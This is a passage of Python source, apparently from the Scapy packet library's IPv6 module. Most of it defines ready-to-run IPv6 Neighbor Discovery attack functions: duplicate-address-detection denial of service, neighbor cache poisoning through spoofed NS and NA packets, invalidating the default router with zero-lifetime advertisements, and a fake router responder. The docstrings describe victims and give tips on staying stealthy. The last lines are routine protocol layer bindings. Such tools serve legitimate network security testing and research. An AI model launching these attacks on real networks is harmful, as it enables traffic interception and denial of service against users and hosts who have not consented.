3568def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
3569                        tgt_filter=None, reply_mac=None):
3570    """
3571    Internal generic helper accepting a specific callback as first argument,
3572    for NS or NA reply. See the two specific functions below.
3573    """
3574
3575    def is_request(req, mac_src_filter, tgt_filter):
3576        """
3577        Check if packet req is a request
3578        """
3579
3580        # Those simple checks are based on Section 5.4.2 of RFC 4862
3581        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
3582            return 0
3583
3584        # Get and compare the MAC address
3585        mac_src = req[Ether].src
3586        if mac_src_filter and mac_src != mac_src_filter:
3587            return 0
3588
3589        # Source must be the unspecified address
3590        if req[IPv6].src != "::":
3591            return 0
3592
3593        # Check destination is the link-local solicited-node multicast
3594        # address associated with target address in received NS
3595        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
3596        if tgt_filter and tgt != tgt_filter:
3597            return 0
3598        received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
3599        expected_snma = in6_getnsma(tgt)
3600        if received_snma != expected_snma:
3601            return 0
3602
3603        return 1
3604
3605    if not iface:
3606        iface = conf.iface
3607
3608    # To prevent sniffing our own traffic
3609    if not reply_mac:
3610        reply_mac = get_if_hwaddr(iface)
3611    sniff_filter = "icmp6 and not ether src %s" % reply_mac
3612
3613    sniff(store=0,
3614          filter=sniff_filter,
3615          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
3616          prn=lambda x: reply_callback(x, reply_mac, iface),
3617          iface=iface)
3618
3619
3620def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
3621                              reply_mac=None):
3622    """
3623    Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3624    3756. This is done by listening incoming NS messages sent from the
3625    unspecified address and sending a NS reply for the target address,
3626    leading the peer to believe that another node is also performing DAD
3627    for that address.
3628
3629    By default, the fake NS sent to create the DoS uses:
3630     - as target address the target address found in received NS.
3631     - as IPv6 source address: the unspecified address (::).
3632     - as IPv6 destination address: the link-local solicited-node multicast
3633       address derived from the target address in received NS.
3634     - the mac address of the interface as source (or reply_mac, see below).
3635     - the multicast mac address derived from the solicited node multicast
3636       address used as IPv6 destination address.
3637
3638    Following arguments can be used to change the behavior:
3639
3640    iface: a specific interface (e.g. "eth0") of the system on which the
3641         DoS should be launched. If None is provided conf.iface is used.
3642
3643    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3644         Only NS messages received from this source will trigger replies.
3645         This allows limiting the effects of the DoS to a single target by
3646         filtering on its mac address. The default value is None: the DoS
3647         is not limited to a specific mac address.
3648
3649    tgt_filter: Same as previous but for a specific target IPv6 address for
3650         received NS. If the target address in the NS message (not the IPv6
3651         destination address) matches that address, then a fake reply will
3652         be sent, i.e. the emitter will be a target of the DoS.
3653
3654    reply_mac: allow specifying a specific source mac address for the reply,
3655         i.e. to prevent the use of the mac address of the interface.
3656    """
3657
3658    def ns_reply_callback(req, reply_mac, iface):
3659        """
3660        Callback that reply to a NS by sending a similar NS
3661        """
3662
3663        # Let's build a reply and send it
3664        mac = req[Ether].src
3665        dst = req[IPv6].dst
3666        tgt = req[ICMPv6ND_NS].tgt
3667        rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt)  # noqa: E501
3668        sendp(rep, iface=iface, verbose=0)
3669
3670        print("Reply NS for target address %s (received from %s)" % (tgt, mac))
3671
3672    _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
3673                        tgt_filter, reply_mac)
3674
3675
3676def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
3677                              reply_mac=None):
3678    """
3679    Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3680    3756. This is done by listening incoming NS messages *sent from the
3681    unspecified address* and sending a NA reply for the target address,
3682    leading the peer to believe that another node is also performing DAD
3683    for that address.
3684
3685    By default, the fake NA sent to create the DoS uses:
3686     - as target address the target address found in received NS.
3687     - as IPv6 source address: the target address found in received NS.
3688     - as IPv6 destination address: the link-local solicited-node multicast
3689       address derived from the target address in received NS.
3690     - the mac address of the interface as source (or reply_mac, see below).
3691     - the multicast mac address derived from the solicited node multicast
3692       address used as IPv6 destination address.
3693     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
3694       with the mac address used as source of the NA.
3695
3696    Following arguments can be used to change the behavior:
3697
3698    iface: a specific interface (e.g. "eth0") of the system on which the
3699          DoS should be launched. If None is provided conf.iface is used.
3700
3701    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3702         Only NS messages received from this source will trigger replies.
3703         This allows limiting the effects of the DoS to a single target by
3704         filtering on its mac address. The default value is None: the DoS
3705         is not limited to a specific mac address.
3706
3707    tgt_filter: Same as previous but for a specific target IPv6 address for
3708         received NS. If the target address in the NS message (not the IPv6
3709         destination address) matches that address, then a fake reply will
3710         be sent, i.e. the emitter will be a target of the DoS.
3711
3712    reply_mac: allow specifying a specific source mac address for the reply,
3713         i.e. to prevent the use of the mac address of the interface. This
3714         address will also be used in the Target Link-Layer Address option.
3715    """
3716
3717    def na_reply_callback(req, reply_mac, iface):
3718        """
3719        Callback that reply to a NS with a NA
3720        """
3721
3722        # Let's build a reply and send it
3723        mac = req[Ether].src
3724        dst = req[IPv6].dst
3725        tgt = req[ICMPv6ND_NS].tgt
3726        rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst)
3727        rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1)  # noqa: E741
3728        rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
3729        sendp(rep, iface=iface, verbose=0)
3730
3731        print("Reply NA for target address %s (received from %s)" % (tgt, mac))
3732
3733    _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
3734                        tgt_filter, reply_mac)
3735
3736
3737def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
3738                           reply_mac=None, router=False):
3739    """
3740    The main purpose of this function is to send fake Neighbor Advertisement
3741    messages to a victim. As the emission of unsolicited Neighbor Advertisement
3742    is pretty pointless (from an attacker standpoint) because it will not
3743    lead to a modification of a victim's neighbor cache, the function send
3744    advertisements in response to received NS (NS sent as part of the DAD,
3745    i.e. with an unspecified address as source, are not considered).
3746
3747    By default, the fake NA sent to create the DoS uses:
3748     - as target address the target address found in received NS.
3749     - as IPv6 source address: the target address
3750     - as IPv6 destination address: the source IPv6 address of received NS
3751       message.
3752     - the mac address of the interface as source (or reply_mac, see below).
3753     - the source mac address of the received NS as destination macs address
3754       of the emitted NA.
3755     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
3756       filled with the mac address used as source of the NA.
3757
3758    Following arguments can be used to change the behavior:
3759
3760    iface: a specific interface (e.g. "eth0") of the system on which the
3761          DoS should be launched. If None is provided conf.iface is used.
3762
3763    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3764         Only NS messages received from this source will trigger replies.
3765         This allows limiting the effects of the DoS to a single target by
3766         filtering on its mac address. The default value is None: the DoS
3767         is not limited to a specific mac address.
3768
3769    tgt_filter: Same as previous but for a specific target IPv6 address for
3770         received NS. If the target address in the NS message (not the IPv6
3771         destination address) matches that address, then a fake reply will
3772         be sent, i.e. the emitter will be a target of the DoS.
3773
3774    reply_mac: allow specifying a specific source mac address for the reply,
3775         i.e. to prevent the use of the mac address of the interface. This
3776         address will also be used in the Target Link-Layer Address option.
3777
3778    router: by the default (False) the 'R' flag in the NA used for the reply
3779         is not set. If the parameter is set to True, the 'R' flag in the
3780         NA is set, advertising us as a router.
3781
3782    Please, keep the following in mind when using the function: for obvious
3783    reasons (kernel space vs. Python speed), when the target of the address
3784    resolution is on the link, the sender of the NS receives 2 NA messages
3785    in a row, the valid one and our fake one. The second one will overwrite
3786    the information provided by the first one, i.e. the natural latency of
3787    Scapy helps here.
3788
3789    In practice, on a common Ethernet link, the emission of the NA from the
3790    genuine target (kernel stack) usually occurs in the same millisecond as
3791    the receipt of the NS. The NA generated by Scapy6 will usually come after
3792    something 20+ ms. On a usual testbed for instance, this difference is
3793    sufficient to have the first data packet sent from the victim to the
3794    destination before it even receives our fake NA.
3795    """
3796
3797    def is_request(req, mac_src_filter, tgt_filter):
3798        """
3799        Check if packet req is a request
3800        """
3801
3802        # Those simple checks are based on Section 5.4.2 of RFC 4862
3803        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
3804            return 0
3805
3806        mac_src = req[Ether].src
3807        if mac_src_filter and mac_src != mac_src_filter:
3808            return 0
3809
3810        # Source must NOT be the unspecified address
3811        if req[IPv6].src == "::":
3812            return 0
3813
3814        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
3815        if tgt_filter and tgt != tgt_filter:
3816            return 0
3817
3818        dst = req[IPv6].dst
3819        if in6_isllsnmaddr(dst):  # Address is Link Layer Solicited Node mcast.
3820
3821            # If this is a real address resolution NS, then the destination
3822            # address of the packet is the link-local solicited node multicast
3823            # address associated with the target of the NS.
3824            # Otherwise, the NS is a NUD related one, i.e. the peer is
3825            # unicasting the NS to check the target is still alive (L2
3826            # information is still in its cache and it is verified)
3827            received_snma = inet_pton(socket.AF_INET6, dst)
3828            expected_snma = in6_getnsma(tgt)
3829            if received_snma != expected_snma:
3830                print("solicited node multicast @ does not match target @!")
3831                return 0
3832
3833        return 1
3834
3835    def reply_callback(req, reply_mac, router, iface):
3836        """
3837        Callback that reply to a NS with a spoofed NA
3838        """
3839
3840        # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
3841        # send it back.
3842        mac = req[Ether].src
3843        pkt = req[IPv6]
3844        src = pkt.src
3845        tgt = req[ICMPv6ND_NS].tgt
3846        rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
3847        # Use the target field from the NS
3848        rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1)  # noqa: E741
3849
3850        # "If the solicitation IP Destination Address is not a multicast
3851        # address, the Target Link-Layer Address option MAY be omitted"
3852        # Given our purpose, we always include it.
3853        rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
3854
3855        sendp(rep, iface=iface, verbose=0)
3856
3857        print("Reply NA for target address %s (received from %s)" % (tgt, mac))
3858
3859    if not iface:
3860        iface = conf.iface
3861    # To prevent sniffing our own traffic
3862    if not reply_mac:
3863        reply_mac = get_if_hwaddr(iface)
3864    sniff_filter = "icmp6 and not ether src %s" % reply_mac
3865
3866    router = 1 if router else 0  # Value of the R flags in NA
3867
3868    sniff(store=0,
3869          filter=sniff_filter,
3870          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
3871          prn=lambda x: reply_callback(x, reply_mac, router, iface),
3872          iface=iface)
3873
3874
3875def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
3876                           dst=None, src_mac=None, dst_mac=None, loop=True,
3877                           inter=1, iface=None):
3878    """
3879    The main purpose of this function is to send fake Neighbor Solicitations
3880    messages to a victim, in order to either create a new entry in its neighbor
3881    cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
3882    that a node SHOULD create the entry or update an existing one (if it is not
3883    currently performing DAD for the target of the NS). The entry's reachability  # noqa: E501
3884    state is set to STALE.
3885
3886    The two main parameters of the function are the source link-layer address
3887    (carried by the Source Link-Layer Address option in the NS) and the
3888    source address of the packet.
3889
3890    Unlike some other NDP_Attack_* function, this one is not based on a
3891    stimulus/response model. When called, it sends the same NS packet in loop
3892    every second (the default)
3893
3894    Following arguments can be used to change the format of the packets:
3895
3896    src_lladdr: the MAC address used in the Source Link-Layer Address option
3897         included in the NS packet. This is the address that the peer should
3898         associate in its neighbor cache with the IPv6 source address of the
3899         packet. If None is provided, the mac address of the interface is
3900         used.
3901
3902    src: the IPv6 address used as source of the packet. If None is provided,
3903         an address associated with the emitting interface will be used
3904         (based on the destination address of the packet).
3905
3906    target: the target address of the NS packet. If no value is provided,
3907         a dummy address (2001:db8::1) is used. The value of the target
3908         has a direct impact on the destination address of the packet if it
3909         is not overridden. By default, the solicited-node multicast address
3910         associated with the target is used as destination address of the
3911         packet. Consider specifying a specific destination address if you
3912         intend to use a target address different than the one of the victim.
3913
3914    dst: The destination address of the NS. By default, the solicited node
3915         multicast address associated with the target address (see previous
3916         parameter) is used if no specific value is provided. The victim
3917         is not expected to check the destination address of the packet,
3918         so using a multicast address like ff02::1 should work if you want
3919         the attack to target all hosts on the link. On the contrary, if
3920         you want to be more stealth, you should provide the target address
3921         for this parameter in order for the packet to be sent only to the
3922         victim.
3923
3924    src_mac: the MAC address used as source of the packet. By default, this
3925         is the address of the interface. If you want to be more stealth,
3926         feel free to use something else. Note that this address is not the
3927         that the victim will use to populate its neighbor cache.
3928
3929    dst_mac: The MAC address used as destination address of the packet. If
3930         the IPv6 destination address is multicast (all-nodes, solicited
3931         node, ...), it will be computed. If the destination address is
3932         unicast, a neighbor solicitation will be performed to get the
3933         associated address. If you want the attack to be stealth, you
3934         can provide the MAC address using this parameter.
3935
3936    loop: By default, this parameter is True, indicating that NS packets
3937         will be sent in loop, separated by 'inter' seconds (see below).
3938         When set to False, a single packet is sent.
3939
3940    inter: When loop parameter is True (the default), this parameter provides
3941         the interval in seconds used for sending NS packets.
3942
3943    iface: to force the sending interface.
3944    """
3945
3946    if not iface:
3947        iface = conf.iface
3948
3949    # Use provided MAC address as source link-layer address option
3950    # or the MAC address of the interface if none is provided.
3951    if not src_lladdr:
3952        src_lladdr = get_if_hwaddr(iface)
3953
3954    # Prepare packets parameters
3955    ether_params = {}
3956    if src_mac:
3957        ether_params["src"] = src_mac
3958
3959    if dst_mac:
3960        ether_params["dst"] = dst_mac
3961
3962    ipv6_params = {}
3963    if src:
3964        ipv6_params["src"] = src
3965    if dst:
3966        ipv6_params["dst"] = dst
3967    else:
3968        # Compute the solicited-node multicast address
3969        # associated with the target address.
3970        tmp = inet_ntop(socket.AF_INET6,
3971                        in6_getnsma(inet_pton(socket.AF_INET6, target)))
3972        ipv6_params["dst"] = tmp
3973
3974    pkt = Ether(**ether_params)
3975    pkt /= IPv6(**ipv6_params)
3976    pkt /= ICMPv6ND_NS(tgt=target)
3977    pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
3978
3979    sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
3980
3981
3982def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
3983                                   ip_src_filter=None, reply_mac=None,
3984                                   tgt_mac=None):
3985    """
3986    The purpose of the function is to monitor incoming RA messages
3987    sent by default routers (RA with a non-zero Router Lifetime values)
3988    and invalidate them by immediately replying with fake RA messages
3989    advertising a zero Router Lifetime value.
3990
3991    The result on receivers is that the router is immediately invalidated,
3992    i.e. the associated entry is discarded from the default router list
3993    and destination cache is updated to reflect the change.
3994
3995    By default, the function considers all RA messages with a non-zero
3996    Router Lifetime value but provides configuration knobs to allow
3997    filtering RA sent by specific routers (Ethernet source address).
3998    With regard to emission, the multicast all-nodes address is used
3999    by default but a specific target can be used, in order for the DoS to
4000    apply only to a specific host.
4001
4002    More precisely, following arguments can be used to change the behavior:
4003
4004    iface: a specific interface (e.g. "eth0") of the system on which the
4005         DoS should be launched. If None is provided conf.iface is used.
4006
4007    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
4008         Only RA messages received from this source will trigger replies.
4009         If other default routers advertised their presence on the link,
4010         their clients will not be impacted by the attack. The default
4011         value is None: the DoS is not limited to a specific mac address.
4012
4013    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
4014         on. Only RA messages received from this source address will trigger
4015         replies. If other default routers advertised their presence on the
4016         link, their clients will not be impacted by the attack. The default
4017         value is None: the DoS is not limited to a specific IPv6 source
4018         address.
4019
4020    reply_mac: allow specifying a specific source mac address for the reply,
4021         i.e. to prevent the use of the mac address of the interface.
4022
4023    tgt_mac: allow limiting the effect of the DoS to a specific host,
4024         by sending the "invalidating RA" only to its mac address.
4025    """
4026
4027    def is_request(req, mac_src_filter, ip_src_filter):
4028        """
4029        Check if packet req is a request
4030        """
4031
4032        if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
4033            return 0
4034
4035        mac_src = req[Ether].src
4036        if mac_src_filter and mac_src != mac_src_filter:
4037            return 0
4038
4039        ip_src = req[IPv6].src
4040        if ip_src_filter and ip_src != ip_src_filter:
4041            return 0
4042
4043        # Check if this is an advertisement for a Default Router
4044        # by looking at Router Lifetime value
4045        if req[ICMPv6ND_RA].routerlifetime == 0:
4046            return 0
4047
4048        return 1
4049
4050    def ra_reply_callback(req, reply_mac, tgt_mac, iface):
4051        """
4052        Callback that sends an RA with a 0 lifetime
4053        """
4054
4055        # Let's build a reply and send it
4056
4057        src = req[IPv6].src
4058
4059        # Prepare packets parameters
4060        ether_params = {}
4061        if reply_mac:
4062            ether_params["src"] = reply_mac
4063
4064        if tgt_mac:
4065            ether_params["dst"] = tgt_mac
4066
4067        # Basis of fake RA (high pref, zero lifetime)
4068        rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
4069        rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
4070
4071        # Add it a PIO from the request ...
4072        tmp = req
4073        while ICMPv6NDOptPrefixInfo in tmp:
4074            pio = tmp[ICMPv6NDOptPrefixInfo]
4075            tmp = pio.payload
4076            del pio.payload
4077            rep /= pio
4078
4079        # ... and source link layer address option
4080        if ICMPv6NDOptSrcLLAddr in req:
4081            mac = req[ICMPv6NDOptSrcLLAddr].lladdr
4082        else:
4083            mac = req[Ether].src
4084        rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
4085
4086        sendp(rep, iface=iface, verbose=0)
4087
4088        print("Fake RA sent with source address %s" % src)
4089
4090    if not iface:
4091        iface = conf.iface
4092    # To prevent sniffing our own traffic
4093    if not reply_mac:
4094        reply_mac = get_if_hwaddr(iface)
4095    sniff_filter = "icmp6 and not ether src %s" % reply_mac
4096
4097    sniff(store=0,
4098          filter=sniff_filter,
4099          lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
4100          prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
4101          iface=iface)
4102
4103
4104def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
4105                           ip_src_filter=None):
4106    """
4107    The purpose of this function is to send provided RA message at layer 2
4108    (i.e. providing a packet starting with IPv6 will not work) in response
4109    to received RS messages. In the end, the function is a simple wrapper
4110    around sendp() that monitor the link for RS messages.
4111
4112    It is probably better explained with an example:
4113
4114      >>> ra  = Ether()/IPv6()/ICMPv6ND_RA()
4115      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
4116      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
4117      >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
4118      >>> NDP_Attack_Fake_Router(ra, iface="eth0")
4119      Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
4120      Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
4121      ...
4122
4123    Following arguments can be used to change the behavior:
4124
4125      ra: the RA message to send in response to received RS message.
4126
4127      iface: a specific interface (e.g. "eth0") of the system on which the
4128             DoS should be launched. If none is provided, conf.iface is
4129             used.
4130
4131      mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
4132         Only RS messages received from this source will trigger a reply.
4133         Note that no changes to provided RA is done which imply that if
4134         you intend to target only the source of the RS using this option,
4135         you will have to set the Ethernet destination address to the same
4136         value in your RA.
4137         The default value for this parameter is None: no filtering on the
4138         source of RS is done.
4139
4140    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
4141         on. Only RS messages received from this source address will trigger
4142         replies. Same comment as for previous argument apply: if you use
4143         the option, you will probably want to set a specific Ethernet
4144         destination address in the RA.
4145    """
4146
4147    def is_request(req, mac_src_filter, ip_src_filter):
4148        """
4149        Check if packet req is a request
4150        """
4151
4152        if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
4153            return 0
4154
4155        mac_src = req[Ether].src
4156        if mac_src_filter and mac_src != mac_src_filter:
4157            return 0
4158
4159        ip_src = req[IPv6].src
4160        if ip_src_filter and ip_src != ip_src_filter:
4161            return 0
4162
4163        return 1
4164
4165    def ra_reply_callback(req, iface):
4166        """
4167        Callback that sends an RA in reply to an RS
4168        """
4169
4170        src = req[IPv6].src
4171        sendp(ra, iface=iface, verbose=0)
4172        print("Fake RA sent in response to RS from %s" % src)
4173
4174    if not iface:
4175        iface = conf.iface
4176    sniff_filter = "icmp6"
4177
4178    sniff(store=0,
4179          filter=sniff_filter,
4180          lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
4181          prn=lambda x: ra_reply_callback(x, iface),
4182          iface=iface)
4183
4184#############################################################################
4185# Pre-load classes                                                         ##
4186#############################################################################
4187
4188
4189def _get_cls(name):
4190    return globals().get(name, Raw)
4191
4192
4193def _load_dict(d):
4194    for k, v in d.items():
4195        d[k] = _get_cls(v)
4196
4197
4198_load_dict(icmp6ndoptscls)
4199_load_dict(icmp6typescls)
4200_load_dict(ipv6nhcls)
4201
4202#############################################################################
4203#############################################################################
4204#                            Layers binding                                 #
4205#############################################################################
4206#############################################################################
4207
4208conf.l3types.register(ETH_P_IPV6, IPv6)
4209conf.l3types.register_num2layer(ETH_P_ALL, IPv46)
4210conf.l2types.register(31, IPv6)
4211conf.l2types.register(DLT_IPV6, IPv6)
4212conf.l2types.register(DLT_RAW, IPv46)
4213conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)
4214
4215bind_layers(Ether, IPv6, type=0x86dd)
4216bind_layers(CookedLinux, IPv6, proto=0x86dd)
4217bind_layers(GRE, IPv6, proto=0x86dd)
4218bind_layers(SNAP, IPv6, code=0x86dd)
4219# AF_INET6 values are platform-dependent. For a detailed explaination, read
4220# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354  # noqa: E501
4221if WINDOWS:
4222    bind_layers(Loopback, IPv6, type=0x18)
4223else:
4224    bind_layers(Loopback, IPv6, type=socket.AF_INET6)
4225bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
4226bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
4227bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
4228bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
4229bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
4230bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
4231bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
4232bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)
4233